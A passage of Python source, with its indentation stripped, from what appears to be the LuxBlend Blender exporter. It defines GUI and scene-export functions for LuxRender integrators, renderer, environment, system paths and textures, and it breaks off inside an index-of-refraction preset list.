if fg.get() == "true":
str += luxInt("finalgathersamples", luxProp(scn, "sintegrator.photonmap.fgathers", 32), 1, 1024, "samples", "The number of finalgather samples to take per pixel during rendering", gui)
str += luxFloat("gatherangle", luxProp(scn, "sintegrator.photonmap.gangle", 10.0), 0.0, 360.0, "gatherangle", "Angle for final gather", gui)
if integratortype.get() == "irradiancecache":
if gui: gui.newline()
ns = luxProp(scn, "sintegrator.irrad.nsamples", 2048)
str += luxInt("nsamples", ns, 1, 16384, "nsamples", "Number of samples to take for estimates", gui)
if gui: gui.newline()
sdepth = luxProp(scn, "sintegrator.irrad.maxspeculardepth", 5)
str += luxInt("maxspeculardepth", sdepth, 1, 32, "maxspeculardepth", "The maximum recursion depth for specular ray casting", gui, 2.0)
idepth = luxProp(scn, "sintegrator.irrad.maxindirectdepth", 5)
str += luxInt("maxindirectdepth", idepth, 1, 32, "maxindirectdepth", "The maximum recursion depth for indirect ray casting", gui, 2.0)
if gui: gui.newline()
minw = luxProp(scn, "sintegrator.irrad.minweight", 0.5)
str += luxFloat("minweight", minw, 0., 1., "minweight", "The minimum weight for irradiance samples", gui)
if gui: gui.newline()
mins = luxProp(scn, "sintegrator.irrad.minspacing", 2.5)
str += luxFloat("minpixelspacing", mins, 0., 10., "minpixelspacing", "The minimum pixel spacing between samples", gui, 2.0)
if gui: gui.newline()
maxs = luxProp(scn, "sintegrator.irrad.maxspacing", 15.)
str += luxFloat("maxpixelspacing", maxs, 0., 100., "maxpixelspacing", "The maximum pixel spacing between samples", gui, 2.0)
if integratortype.get() == "igi":
if gui: gui.newline(" Depth:", 8, 0, None, [0.4,0.4,0.4])
depth = luxProp(scn, "sintegrator.igi.maxdepth", 5)
str += luxInt("maxdepth", depth, 1, 32, "maxdepth", "The maximum recursion depth for ray casting", gui, 2.0)
if showadvanced.get()=="true":
# Advanced parameters
if gui: gui.newline(" VLights:")
str += luxInt("nsets", luxProp(scn, "sintegrator.igi.nsets", 4), 1, 100, "nsets", "The number of virtual lights sets", gui)
str += luxInt("nlights", luxProp(scn, "sintegrator.igi.nlights", 64), 1, 1000, "nlights", "The number of light paths per light set", gui)
str += luxFloat("mindist", luxProp(scn, "sintegrator.igi.mindist", 0.1), 0.01, 10.0, "mindist", "The minimal distance to a virtual light to take it into account", gui)
if integratortype.get() == "dipolesubsurface":
if gui: gui.newline()
depth = luxProp(scn, "sintegrator.dipole.maxdepth", 5)
str += luxInt("maxdepth", depth, 1, 32, "maxdepth", "The maximum recursion depth for ray casting", gui, 2.0)
if gui: gui.newline()
str += luxFloat("minsampledistance", luxProp(scn, "sintegrator.dipole.mindist", 0.25), 0.001, 100.0, "minsampledistance", "The minimal distance between irradiance samples", gui, 2.0)
if gui: gui.newline()
str += luxFloat("maxerror", luxProp(scn, "sintegrator.dipole.maxerror", 0.05), 0.01, 3.0, "maxerror", "The maximum error when computing subsurface scattering", gui)
return str
def luxVolumeIntegrator(scn, gui=None):
global icon_c_volumeintegrator
str = ""
if scn:
integratortype = luxProp(scn, "vintegrator.type", "single")
str = luxIdentifier("VolumeIntegrator", integratortype, ["emission", "single"], "VOLUME INT", "select volume integrator type", gui, icon_c_volumeintegrator)
if integratortype.get() == "emission":
str += luxFloat("stepsize", luxProp(scn, "vintegrator.emission.stepsize", 1.0), 0.0, 100.0, "stepsize", "Stepsize for volumes", gui)
if integratortype.get() == "single":
str += luxFloat("stepsize", luxProp(scn, "vintegrator.emission.stepsize", 1.0), 0.0, 100.0, "stepsize", "Stepsize for volumes", gui)
return str
def luxRenderer(scn, gui=None):
str = ""
if scn:
rendtype = luxProp(scn, "renderer.type", "sample")
str = luxIdentifier("Renderer", rendtype, ["sample", "metropolis" ], "RENDERER", "select renderer type", gui)
if rendtype.get() == "metropolis":
# Default parameters
if gui: gui.newline()
str += luxInt("samplesperpixel", luxProp(scn, "renderer.metro.samplesperpixel", 64), 0, 100, "samplesperpixel", "Average number of samples per pixel", gui, 2.0)
if gui: gui.newline()
str += luxInt("maxdepth", luxProp(scn, "renderer.metro.maxdepth", 6), 1, 32, "maxdepth", "The maximum depth for the path casting", gui, 2.0)
if gui: gui.newline()
str += luxBool("indirectonly", luxProp(scn, "renderer.metro.indirectonly", "false"), "indirectonly", "Only compute the indirect illumination", gui)
if gui: gui.newline()
ds = luxProp(scn, "renderer.metro.directseparately", "true")
str += luxBool("dodirectseparately", ds, "dodirectseperately", "Do direct lighting separately", gui)
if ds.get() == "true":
str += luxInt("directsamples", luxProp(scn, "renderer.metro.directsamples", 8), 1, 1024, "directsamples", "Samples per pixel for separate direct lighting", gui)
return str
def luxEnvironment(scn, gui=None):
global icon_c_environment
str = ""
if scn:
envtype = luxProp(scn, "env.type", "infinite")
lsstr = luxIdentifier("LightSource", envtype, ["none", "infinite"], "ENVIRONMENT", "select environment light type", gui, icon_c_environment)
if gui: gui.newline()
str = ""
if envtype.get() != "none":
if envtype.get() in ["infinite", "sunsky"]:
# env_lg = luxProp(scn, "env.lightgroup", "default")
# luxString("env.lightgroup", env_lg, "lightgroup", "Environment light group", gui)
# if luxProp(scn, "nolg", "false").get()!="true":
# lsstr = '\nLightGroup "' + env_lg.get() + '"' + lsstr
rotZ = luxProp(scn, "env.rotation", 0.0)
rotY = luxProp(scn, "env.rotationY", 0.0)
rotX = luxProp(scn, "env.rotationX", 0.0)
if gui: gui.newline()
luxFloat("rotation", rotX, 0.0, 360.0, "rot X", "environment rotation X", gui, 0.66)
luxFloat("rotation", rotY, 0.0, 360.0, "rot Y", "environment rotation Y", gui, 0.66)
luxFloat("rotation", rotZ, 0.0, 360.0, "rot Z", "environment rotation Z", gui, 0.66)
if rotZ.get() != 0 or rotY.get() != 0 or rotX.get() != 0:
str += "\tRotate %d 1 0 0\n"%(rotX.get())
str += "\tRotate %d 0 1 0\n"%(rotY.get())
str += "\tRotate %d 0 0 1\n"%(rotZ.get())
str += "\t"+lsstr
infinitehassun = 0
if envtype.get() == "infinite":
map = luxProp(scn, "env.infinite.mapname", "")
mapstr = luxFile("mapname", map, "map-file", "filename of the environment map", gui, 1.5)
mapstr += luxFloat("gamma", luxProp(scn, "env.infinite.gamma", 1.0), 0.0, 6.0, "gamma", "", gui, 1.0)
if map.get() != "":
str += mapstr
else:
try:
worldcolor = Blender.World.Get('World').getHor()
str += "\n \"color L\" [%g %g %g]" %(worldcolor[0], worldcolor[1], worldcolor[2])
except: pass
str += luxFloat("scale", luxProp(scn, "env.infinite.gain", 1.0), 0.0001, 100.0, "scale", "Infinite Env Gain", gui, 1.0)
str += "\n"
#if gui: gui.newline("GLOBAL:", 8, 0, None, [0.75,0.5,0.25])
#luxFloat("scale", luxProp(scn, "global.scale", 1.0), 0.0, 10.0, "scale", "global world scale", gui)
return str
def luxSystem(scn, gui=None):
if scn:
if gui: gui.newline("PATHS:", 10)
lp = luxProp(scn, "pbrt", "")
lp.set(Blender.sys.dirname(lp.get())+os.sep)
luxPath("PBRT dir", lp, "pbrt binary dir", "pbrt installation path", gui, 2.0)
# luxFile("GUI filename", luxProp(scn, "lux", ""), "lux-file", "filename and path of the lux GUI executable", gui, 2.0)
# luxFile("Console filename", luxProp(scn, "luxconsole", ""), "lux-file-console", "filename and path of the lux console executable", gui, 2.0)
if gui: gui.newline()
luxFile("datadir", luxProp(scn, "datadir", ""), "default out dir", "default.pbrt save path", gui, 2.0)
if gui: gui.newline()
pm = ["absolute","relative","flat"]
luxOption("pathmode", luxProp(scn, "pathmode", "absolute"), pm, "path-mode", "select format for paths on export", gui, 2.0)
if gui: gui.newline("PRIORITY:", 10)
luxnice = luxProp(scn, "luxnice", 10)
if osys.platform=="win32":
r = gui.getRect(2, 1)
Draw.Menu("priority%t|abovenormal%x-10|normal%x0|belownormal%x10|low%x19", evtLuxGui, r[0], r[1], r[2], r[3], luxnice.get(), "", lambda e,v: luxnice.set(v))
else: luxInt("nice", luxnice, -20, 19, "nice", "nice value. Range goes from -20 (highest priority) to 19 (lowest)", gui)
# luxBool('export.threaded', luxProp(scn, 'export.threaded', 'true'), 'Pipe in background', 'When using pipe export, do not block Blender UI', gui, 1.0)
if gui: gui.newline("ANIM:", 10)
useparamkeys = luxProp(scn, "useparamkeys", "false")
luxBool("useparamkeys", useparamkeys, "Enable Parameter IPO Keyframing", "Enables keyframing of luxblend parameters", gui, 2.0)
if gui: gui.newline("PARAMS:", 10)
parammodeadvanced = luxProp(scn, "parammodeadvanced", "false")
luxBool("parammodeadvanced", parammodeadvanced, "Default Advanced Parameters", "Always use advanced parameters by default", gui, 2.0)
if gui: gui.newline("PREVIEW:", 10)
qs = ["low","medium","high","very high"]
defprevmat = luxProp(scn, "defprevmat", "high")
luxOption("defprevmat", defprevmat, qs, "Materials", "Select default preview quality in material editor for materials", gui, 1.0)
if gui: gui.newline("GAMMA:", 10)
luxBool("RGC", luxProp(scn, "RGC", "true"), "RGC", "use reverse gamma correction", gui)
# luxBool("ColClamp", luxProp(scn, "colorclamp", "false"), "ColClamp", "clamp all colors to 0.0-0.9", gui)
# if gui: gui.newline("MESH:", 10)
# luxBool("mesh_optimizing", luxProp(scn, "mesh_optimizing", "true"), "optimize meshes", "Optimize meshes during export", gui, 2.0)
#luxInt("trianglemesh thr", luxProp(scn, "trianglemesh_thr", 0), 0, 10000000, "trianglemesh threshold", "Vertex threshold for exporting (wald) trianglemesh object(s)", gui, 2.0)
#if gui: gui.newline()
#luxInt("barytrianglemesh thr", luxProp(scn, "barytrianglemesh_thr", 300000), 0, 100000000, "barytrianglemesh threshold", "Vertex threshold for exporting barytrianglemesh object(s) (slower but uses less memory)", gui, 2.0)
if gui: gui.newline("INSTANCING:", 10)
luxInt("instancing_threshold", luxProp(scn, "instancing_threshold", 2), 0, 1000000, "object instancing threshold", "Threshold to created instanced objects", gui, 2.0)
# dougal2 packed images, enable this when implemented in Lux itself
#if gui: gui.newline('TEXTURES:',10)
#impack = luxProp(scn, 'packtextures', 'false')
#luxBool('impack', impack, 'Pack All Images', '', gui, 2.0)
def scalelist(list, factor):
for i in range(len(list)): list[i] = list[i] * factor
return list
def luxMapping(key, mat, gui, level=0):
global icon_map2d, icon_map2dparam
if gui: gui.newline("2Dmap:", -2, level, icon_map2d)
mapping = luxProp(mat, key+".mapping", "uv")
mappings = ["uv","spherical","cylindrical","planar"]
str = luxOption("mapping", mapping, mappings, "mapping", "", gui, 0.5)
if mapping.get() == "uv":
if gui: gui.newline()
str += luxFloat("uscale", luxProp(mat, key+".uscale", 1.0), -100.0, 100.0, "Us", "u-scale", gui, 0.5)
str += luxFloat("vscale", luxProp(mat, key+".vscale", -1.0), -100.0, 100.0, "Vs", "v-scale", gui, 0.5)
str += luxFloat("udelta", luxProp(mat, key+".udelta", 0.0), -100.0, 100.0, "Ud", "u-delta", gui, 0.5)
str += luxFloat("vdelta", luxProp(mat, key+".vdelta", 0.0), -100.0, 100.0, "Vd", "v-delta", gui, 0.5)
if mapping.get() == "planar":
str += luxFloat("udelta", luxProp(mat, key+".udelta", 0.0), -100.0, 100.0, "Ud", "u-delta", gui, 0.75)
str += luxFloat("vdelta", luxProp(mat, key+".vdelta", 0.0), -100.0, 100.0, "Vd", "v-delta", gui, 0.75)
if gui: gui.newline("v1:", -2, level+1, icon_map2dparam)
str += luxVector("v1", luxProp(mat, key+".v1", "1 0 0"), -100.0, 100.0, "v1", "v1-vector", gui, 2.0)
if gui: gui.newline("v2:", -2, level+1, icon_map2dparam)
str += luxVector("v2", luxProp(mat, key+".v2", "0 1 0"), -100.0, 100.0, "v2", "v2-vector", gui, 2.0)
return str
def lux3DMapping(key, mat, gui, level=0):
global icon_map3dparam
str = ""
if gui: gui.newline("scale:", -2, level, icon_map3dparam)
str += luxVectorUniform("scale", luxProp(mat, key+".3dscale", 1.0), 0.001, 1000.0, "scale", "scale-vector", gui, 2.0)
if gui: gui.newline("rot:", -2, level, icon_map3dparam)
str += luxVector("rotate", luxProp(mat, key+".3drotate", "0 0 0"), -360.0, 360.0, "rotate", "rotate-vector", gui, 2.0)
if gui: gui.newline("move:", -2, level, icon_map3dparam)
str += luxVector("translate", luxProp(mat, key+".3dtranslate", "0 0 0"), -1000.0, 1000.0, "move", "translate-vector", gui, 2.0)
return str
def getTreeNameById(tree, i): # helper function to retrive name of the selected treemenu-item
for t in tree:
if type(t)==types.TupleType:
if type(t[1])==types.ListType:
n=getTreeNameById(t[1], i)
if n: return n
elif t[1]==i: return t[0]
return None
def luxTexture(name, parentkey, type, default, min, max, caption, hint, mat, gui, matlevel, texlevel=0, lightsource=0, overrideicon=""):
global icon_tex, icon_texcol, icon_texmix, icon_texmixcol, icon_texparam, icon_spectex
def c(t1, t2):
return (t1[0]+t2[0], t1[1]+t2[1])
def alternativedefault(type, default):
if type=="float": return 0.0
else: return "0.0 0.0 0.0"
level = matlevel + texlevel
keyname = "%s:%s"%(parentkey, name)
texname = "%s:%s"%(mat.getName(), keyname)
# if gui: gui.newline(caption+":", 0, level)
if(lightsource == 0):
if texlevel == 0: texture = luxProp(mat, keyname+".texture", "imagemap")
else: texture = luxProp(mat, keyname+".texture", "constant")
else:
texture = luxProp(mat, keyname+".texture", "blackbody")
textures = ["constant","dots","fbm","imagemap","marble","mix","bilerp","checkerboard","scale","uv","windy","wrinkled"]
if gui:
if(overrideicon != ""):
icon = overrideicon
else:
icon = icon_tex
if texture.get() in ["mix", "scale", "checkerboard", "dots"]:
if type=="color": icon = icon_texmixcol
else: icon = icon_texmix
elif texture.get() in ["constant", "blackbody", "equalenergy", "frequency", "gaussian", "regulardata", "irregulardata"]:
icon = icon_spectex
else:
if type=="color": icon = icon_texcol
else: icon = icon_tex
if (texlevel > 0): gui.newline(caption+":", -2, level, icon, scalelist([0.5,0.5,0.5],2.0/(level+2)))
else: gui.newline("texture:", -2, level, icon, scalelist([0.5,0.5,0.5],2.0/(level+2)))
luxOption("texture", texture, textures, "texture", "", gui, 2)
str = "Texture \"%s\" \"%s\" \"%s\""%(texname, type, texture.get())
if gui: Draw.PushButton(">", evtLuxGui, gui.xmax+gui.h, gui.y-gui.h, gui.h, gui.h, "Menu", lambda e,v: showMatTexMenu(mat,keyname,True))
if gui: # Draw Texture level Material preview
luxPreview(mat, parentkey, 1, False, False, name, gui, texlevel, [0.5, 0.5, 0.5])
# Add an offset for next controls
#r = gui.getRect(1.0, 1)
#gui.x += 140
if texture.get() == "constant":
value = luxProp(mat, keyname+".value", default)
if type == "float": luxFloat("value", value, min, max, "", "", gui, 1.1)
elif type == "color": luxRGB("value", value, max, "", "", gui, 2)
# direct version
if type == "color": return ("", " \"%s %s\" [%s]"%(type, name, value.getRGC()))
return ("", " \"%s %s\" [%s]"%(type, name, value.get()))
# indirect version
# if type == "color": str += " \"%s value\" [%s]"%(type, value.getRGC())
# else: str += " \"%s value\" [%s]"%(type, value.get())
if texture.get() == "imagemap":
if gui: gui.newline("IM-clip:", -2, level)
str += luxOption("wrap", luxProp(mat, keyname+".wrap", "repeat"), ["repeat","black","clamp"], "repeat", "", gui, 1.0)
if gui: gui.newline("IM-source:", -2, level)
# ZANQDO
texturefilename = luxProp(mat, keyname+".filename", "")
extimage = luxProp(mat, keyname+'.externalimage', "true")
luxBool("External Image", extimage, "External Image", "External Image", gui, 1.0)
if gui: gui.newline("IM-path:", -2, level)
if extimage.get() == "true":
luxFile("filename", texturefilename, "file", "texture file path", gui, 2.0)
else:
bil = [i.filename for i in Image.Get() if '.' in i.filename]
try:
uti = [i.filename for i in Image.Get() if '.' not in i.filename]
if len(uti) > 0:
luxLabel("INFO: Images not listed here must be saved first", gui)
except: pass
if len(bil) > 0:
luxOption("Image", texturefilename, bil, "Blender Images", "Blender Image", gui, 2.0)
else:
luxLabel("No Blender Images - Load Image in the Image Editor", gui)
# dougal2 image file packing
# impack = luxProp(Scene.GetCurrent(), 'packtextures', 'false')
if True: # impack.get() == 'false':
str += luxFile("filename", texturefilename, "file", "texture file path", None, 2.0)
# else:
# import zlib, base64
# def get_image_data(filename):
# try:
# f=open(filename,'rb')
# d=f.read()
# f.close()
# except:
# print('Error reading image data from %s' % filename)
# d = ''
# return base64.b64encode(zlib.compress(d))
# imdata = get_image_data(texturefilename.get())
# str += '\r\n "string imagedata" ["%s"]' % imdata
useseq = luxProp(mat, keyname+".useseq", "false")
luxCollapse("usesew", useseq, "Sequence", "", gui, 2.0)
if useseq.get() == "true":
seqframes = luxProp(mat, keyname+".seqframes", 100)
luxInt("frames", seqframes, 1, 100000, "Frames", "", gui, 0.5)
seqoffset = luxProp(mat, keyname+".seqoffset", 0)
luxInt("offset", seqoffset, 0, 100000, "Offset", "", gui, 0.5)
seqstartframe = luxProp(mat, keyname+".seqsframe", 1)
luxInt("startframe", seqstartframe, 1, 100000, "StartFr", "", gui, 0.5)
seqcyclic = luxProp(mat, keyname+".seqcycl", "false")
luxBool("cyclic", seqcyclic, "Cyclic", "", gui, 0.5)
totalframes = seqframes.get()
currentframe = Blender.Get('curframe')
if(currentframe < seqstartframe.get()):
fnumber = 1 + seqoffset.get()
else:
fnumber = (currentframe - (seqstartframe.get()-1)) + seqoffset.get()
if(fnumber > seqframes.get()):
if(seqcyclic.get() == "false"):
fnumber = seqframes.get()
else:
fnumber = currentframe % seqframes.get()
import re
def get_seq_filename(number, filename):
m = re.findall(r'(\d+)', filename)
if len(m) == 0:
return "ERR: Can't find pattern"
rightmost_number = m[len(m)-1]
seq_length = len(rightmost_number)
nstr = "%i" %number
new_seq_number = nstr.zfill(seq_length)
return filename.replace(rightmost_number, new_seq_number)
texturefilename.set(get_seq_filename(fnumber, texturefilename.get()))
if gui: gui.newline()
str += luxFloat("gamma", luxProp(mat, keyname+".gamma", texturegamma()), 0.0, 6.0, "gamma", "", gui, 0.75)
str += luxFloat("scale", luxProp(mat, keyname+".scale", 1.0), 0.0, 10.0, "scale", "", gui, 0.5)
# filttype = luxProp(mat, keyname+".filtertype", "bilinear")
# filttypes = ["mipmap_ewa","mipmap_trilinear","bilinear","nearest"]
# str += luxOption("filtertype", filttype, filttypes, "filtertype", "Choose the filtering method to use for the image texture", gui, 0.75)
# if filttype.get() == "mipmap_ewa" or filttype.get() == "mipmap_trilinear":
# str += luxFloat("maxanisotropy", luxProp(mat, keyname+".maxanisotropy", 8.0), 1.0, 512.0, "maxaniso", "", gui, 1.0)
# str += luxInt("discardmipmaps", luxProp(mat, keyname+".discardmipmaps", 0), 0, 1, "discardmips", "", gui, 1.0)
str += luxMapping(keyname, mat, gui, level+1)
if texture.get() == "mix":
(s, l) = c(("", ""), luxTexture("amount", keyname, "float", 0.5, 0.0, 1.0, "amount", "The degree of mix between the two textures", mat, gui, matlevel, texlevel+1, lightsource))
(s, l) = c((s, l), luxTexture("tex1", keyname, type, default, min, max, "tex1", "", mat, gui, matlevel, texlevel+1, lightsource))
(s, l) = c((s, l), luxTexture("tex2", keyname, type, alternativedefault(type, default), min, max, "tex2", "", mat, gui, matlevel, texlevel+1, lightsource))
str = s + str + l
if texture.get() == "scale":
(s, l) = c(("", ""), luxTexture("tex1", keyname, type, default, min, max, "tex1", "", mat, gui, matlevel, texlevel+1, lightsource))
(s, l) = c((s, l), luxTexture("tex2", keyname, type, alternativedefault(type, default), min, max, "tex2", "", mat, gui, matlevel, texlevel+1, lightsource))
str = s + str + l
if texture.get() == "bilerp":
if type == "float":
str += luxFloat("v00", luxProp(mat, keyname+".v00", 0.0), min, max, "v00", "", gui, 1.0)
str += luxFloat("v01", luxProp(mat, keyname+".v01", 1.0), min, max, "v01", "", gui, 1.0)
if gui: gui.newline("", -2)
str += luxFloat("v10", luxProp(mat, keyname+".v10", 0.0), min, max, "v10", "", gui, 1.0)
str += luxFloat("v11", luxProp(mat, keyname+".v11", 1.0), min, max, "v11", "", gui, 1.0)
elif type == "color":
if gui: gui.newline(" v00:", -2)
str += luxRGB("v00", luxProp(mat, keyname+".v00", "0.0 0.0 0.0"), max, "v00", "", gui, 2.0)
if gui: gui.newline(" v01:", -2)
str += luxRGB("v01", luxProp(mat, keyname+".v01", "1.0 1.0 1.0"), max, "v01", "", gui, 2.0)
if gui: gui.newline(" v10:", -2)
str += luxRGB("v10", luxProp(mat, keyname+".v10", "0.0 0.0 0.0"), max, "v10", "", gui, 2.0)
if gui: gui.newline(" v11:", -2)
str += luxRGB("v11", luxProp(mat, keyname+".v11", "1.0 1.0 1.0"), max, "v11", "", gui, 2.0)
str += luxMapping(keyname, mat, gui, level+1)
if texture.get() == "windy":
str += lux3DMapping(keyname, mat, gui, level+1)
# this texture has no options
if texture.get() == "checkerboard":
dim = luxProp(mat, keyname+".dim", 2)
str += luxInt("dimension", dim, 2, 3, "dim", "", gui, 1)
if dim.get() == 2: str += luxOption("aamode", luxProp(mat, keyname+".aamode", "closedform"), ["closedform","supersample","none"], "aamode", "antialiasing mode", gui, 0.6)
if gui: gui.newline("", -2)
(s, l) = c(("", ""), luxTexture("tex1", keyname, type, default, min, max, "tex1", "", mat, gui, matlevel, texlevel+1, lightsource))
(s, l) = c((s, l), luxTexture("tex2", keyname, type, alternativedefault(type, default), min, max, "tex2", "", mat, gui, matlevel, texlevel+1, lightsource))
str = s + str + l
if dim.get() == 2: str += luxMapping(keyname, mat, gui, level+1)
if dim.get() == 3: str += lux3DMapping(keyname, mat, gui, level+1)
if texture.get() == "dots":
(s, l) = c(("", ""), luxTexture("inside", keyname, type, default, min, max, "inside", "", mat, gui, matlevel, texlevel+1, lightsource))
(s, l) = c((s, l), luxTexture("outside", keyname, type, alternativedefault(type, default), min, max, "outside", "", mat, gui, matlevel, texlevel+1, lightsource))
str = s + str + l
str += luxMapping(keyname, mat, gui, level+1)
if texture.get() == "fbm":
str += luxInt("octaves", luxProp(mat, keyname+".octaves", 8), 1, 100, "octaves", "", gui, 1)
# if gui: gui.newline("", -2)
str += luxFloat("roughness", luxProp(mat, keyname+".roughness", 0.5), 0.0, 1.0, "roughness", "", gui, 1, 1)
if gui: gui.newline("", -2)
str += lux3DMapping(keyname, mat, gui, level+1)
if texture.get() == "marble":
str += luxInt("octaves", luxProp(mat, keyname+".octaves", 8), 1, 100, "octaves", "", gui, 1)
# if gui: gui.newline("", -2)
str += luxFloat("roughness", luxProp(mat, keyname+".roughness", 0.5), 0.0, 1.0, "roughness", "", gui, 1, 1)
if gui: gui.newline("", -2)
str += luxFloat("nscale", luxProp(mat, keyname+".nscale", 1.0), 0.0, 100.0, "nscale", "Scaling factor for the noise input", gui, 1.0)
str += luxFloat("variation", luxProp(mat, keyname+".variation", 0.2), 0.0, 100.0, "variation", "A scaling factor for the noise input function", gui, 1.0)
if gui: gui.newline("", -2)
str += lux3DMapping(keyname, mat, gui, level+1)
if texture.get() == "wrinkled":
str += luxInt("octaves", luxProp(mat, keyname+".octaves", 8), 1, 100, "octaves", "", gui, 1)
# if gui: gui.newline("", -2)
str += luxFloat("roughness", luxProp(mat, keyname+".roughness", 0.5), 0.0, 1.0, "roughness", "", gui, 1, 1)
if gui: gui.newline("", -2)
str += lux3DMapping(keyname, mat, gui, level+1)
return (str+"\n", " \"texture %s\" [\"%s\"]"%(name, texname))
def luxSpectrumTexture(name, key, default, max, caption, hint, mat, gui, level=0):
global icon_col
if gui: gui.newline(caption, 4, level, icon_col, scalelist([0.5,0.6,0.5],2.0/(level+2)))
str = ""
keyname = "%s:%s"%(key, name)
texname = "%s:%s"%(mat.getName(), keyname)
value = luxProp(mat, keyname, default)
link = luxRGB(name, value, max, "", hint, gui, 2.0)
tex = luxProp(mat, keyname+".textured", False)
if gui: Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, tex.get()=="true", "use texture", lambda e,v:tex.set(["false","true"][bool(v)]))
if tex.get()=="true":
if gui: gui.newline("", -2)
(str, link) = luxTexture(name, key, "color", default, 0, max, caption, hint, mat, gui, level+1)
if value.getRGB() != (1.0, 1.0, 1.0):
if str == "": # handle special case if texture is a just a constant
str += "Texture \"%s\" \"color\" \"scale\" \"color tex1\" [%s] \"color tex2\" [%s]\n"%(texname+".scale", (link.rpartition("[")[2])[0:-1], value.get())
else: str += "Texture \"%s\" \"color\" \"scale\" \"texture tex1\" [\"%s\"] \"color tex2\" [%s]\n"%(texname+".scale", texname, value.get())
link = " \"texture %s\" [\"%s\"]"%(name, texname+".scale")
return (str, link)
def luxLightSpectrumTexture(name, key, default, max, caption, hint, mat, gui, level=0):
#if gui: gui.newline(caption, 4, level, icon_emission, scalelist([0.6,0.5,0.5],2.0/(level+2)))
str = ""
keyname = "%s:%s"%(key, name)
texname = "%s:%s"%(mat.getName(), keyname)
(str, link) = luxTexture(name, key, "color", default, 0, max, caption, hint, mat, gui, level+1, 0, 1)
return (str, link)
def luxFloatTexture(name, key, default, min, max, caption, hint, mat, gui, level=0):
global icon_float
if gui: gui.newline(caption, 4, level, icon_float, scalelist([0.5,0.5,0.6],2.0/(level+2)))
str = ""
keyname = "%s:%s"%(key, name)
texname = "%s:%s"%(mat.getName(), keyname)
value = luxProp(mat, keyname, default)
link = luxFloat(name, value, min, max, "", hint, gui, 2.0)
tex = luxProp(mat, keyname+".textured", False)
if gui: Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, tex.get()=="true", "use texture", lambda e,v:tex.set(["false","true"][bool(v)]))
if tex.get()=="true":
if gui: gui.newline("", -2)
(str, link) = luxTexture(name, key, "float", default, min, max, caption, hint, mat, gui, level+1)
if value.get() != 1.0:
if str == "": # handle special case if texture is a just a constant
str += "Texture \"%s\" \"float\" \"scale\" \"float tex1\" [%s] \"float tex2\" [%s]\n"%(texname+".scale", (link.rpartition("[")[2])[0:-1], value.get())
else: str += "Texture \"%s\" \"float\" \"scale\" \"texture tex1\" [\"%s\"] \"float tex2\" [%s]\n"%(texname+".scale", texname, value.get())
link = " \"texture %s\" [\"%s\"]"%(name, texname+".scale")
return (str, link)
def luxFloatSliderTexture(name, key, default, min, max, caption, hint, mat, gui, level=0):
global icon_float
if gui: gui.newline(caption, 4, level, icon_float, scalelist([0.5,0.5,0.6],2.0/(level+2)))
str = ""
keyname = "%s:%s"%(key, name)
texname = "%s:%s"%(mat.getName(), keyname)
value = luxProp(mat, keyname, default)
link = luxFloat(name, value, min, max, caption, hint, gui, 2.0, 1)
tex = luxProp(mat, keyname+".textured", False)
if gui: Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, tex.get()=="true", "use texture", lambda e,v:tex.set(["false","true"][bool(v)]))
if tex.get()=="true":
if gui: gui.newline("", -2)
(str, link) = luxTexture(name, key, "float", default, min, max, caption, hint, mat, gui, level+1)
if value.get() != 1.0:
if str == "": # handle special case if texture is a just a constant
str += "Texture \"%s\" \"float\" \"scale\" \"float tex1\" [%s] \"float tex2\" [%s]\n"%(texname+".scale", (link.rpartition("[")[2])[0:-1], value.get())
else: str += "Texture \"%s\" \"float\" \"scale\" \"texture tex1\" [\"%s\"] \"float tex2\" [%s]\n"%(texname+".scale", texname, value.get())
link = " \"texture %s\" [\"%s\"]"%(name, texname+".scale")
return (str, link)
def luxExponentTexture(name, key, default, min, max, caption, hint, mat, gui, level=0):
global icon_float
if gui: gui.newline(caption, 4, level, icon_float, scalelist([0.5,0.5,0.6],2.0/(level+2)))
str = ""
keyname = "%s:%s"%(key, name)
texname = "%s:%s"%(mat.getName(), keyname)
value = luxProp(mat, keyname, default)
if(value.get() == None): value.set(0.002)
# link = luxFloat(name, value, min, max, "", hint, gui, 2.0)
if gui:
r = gui.getRect(2.0, 1)
Draw.Number("", evtLuxGui, r[0], r[1], r[2], r[3], float(1.0/value.getFloat()), 1.0, 1000000.0, hint, lambda e,v: value.set(1.0/v))
link = " \"float %s\" [%f]"%(name, value.getFloat())
tex = luxProp(mat, keyname+".textured", False)
if gui: Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, tex.get()=="true", "use texture", lambda e,v:tex.set(["false","true"][bool(v)]))
if tex.get()=="true":
if gui: gui.newline("", -2)
(str, link) = luxTexture(name, key, "float", default, min, max, caption, hint, mat, gui, level+1)
if value.get() != 1.0:
if str == "": # handle special case if texture is a just a constant
str += "Texture \"%s\" \"float\" \"scale\" \"float tex1\" [%s] \"float tex2\" [%s]\n"%(texname+".scale", (link.rpartition("[")[2])[0:-1], value.get())
else: str += "Texture \"%s\" \"float\" \"scale\" \"texture tex1\" [\"%s\"] \"float tex2\" [%s]\n"%(texname+".scale", texname, value.get())
link = " \"texture %s\" [\"%s\"]"%(name, texname+".scale")
return (str, link)
def luxDispFloatTexture(name, key, default, min, max, caption, hint, mat, gui, level=0):
global icon_float
if gui: gui.newline(caption, 4, level, icon_float, scalelist([0.5,0.5,0.6],2.0/(level+2)))
str = ""
keyname = "%s:%s"%(key, name)
texname = "%s:%s"%(mat.getName(), keyname)
value = luxProp(mat, keyname, default)
link = luxFloat(name, value, min, max, "", hint, gui, 2.0)
tex = luxProp(mat, keyname+".textured", False)
if gui: Draw.Toggle("T", evtLuxGui, gui.x, gui.y-gui.h, gui.h, gui.h, tex.get()=="true", "use texture", lambda e,v:tex.set(["false","true"][bool(v)]))
if tex.get()=="true":
if gui: gui.newline("", -2)
(str, link) = luxTexture(name, key, "float", default, min, max, caption, hint, mat, gui, level+1)
str += "Texture \"%s\" \"float\" \"scale\" \"texture tex1\" [\"%s\"] \"float tex2\" [%s]\n"%(texname+".scale", texname, value.get())
link = " \"texture %s\" [\"%s\"]"%(name, texname+".scale")
return (str, link)
def luxIORFloatTexture(name, key, default, min, max, caption, hint, mat, gui, level=0):
# IOR preset data
iornames = ["0Z *** Gases @ 0 C ***", "01 - Vacuum", "02 - Air @ STP", "03 - Air", "04 - Helium", "05 - Hydrogen", "06 - Carbon dioxide",
